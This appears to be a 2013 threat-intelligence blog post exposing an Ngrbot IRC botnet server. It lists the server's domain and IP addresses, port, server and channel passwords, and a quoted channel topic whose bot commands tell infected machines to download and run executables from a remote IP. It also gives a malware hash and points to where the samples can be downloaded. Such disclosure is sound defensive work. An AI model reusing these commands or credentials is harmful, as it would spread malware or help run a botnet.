t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)

By I_Post_Ur_Info, June 4, 2013

Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187

Server: t.baerr01.com
Port: 6512
Server password: smart
Channel: #dpi
:hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe
Channel: #tar
Channel password: smart

A modified ircd is used, making it difficult to connect using a regular irc client.

Related md5s (search on malwr.com to download the samples):
ngrbot: 1704b32f095bffb55c6c0a01f48a83ae

Categories: Uncategorized

Tags: ngrBot

Previous postwww.welovegiveaways.net (Andromeda http botnet hosted by enzu.com)

Next postbreathespacesfacebook.org (Socks5Masterz botnet hosted by burst.net)

dd.sult4n.net(ngrBot hosted in United States Chicago Steadfast Networks)

178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)

x.e1b2.org (ngrBot irc botnet hosted by namecheap.com)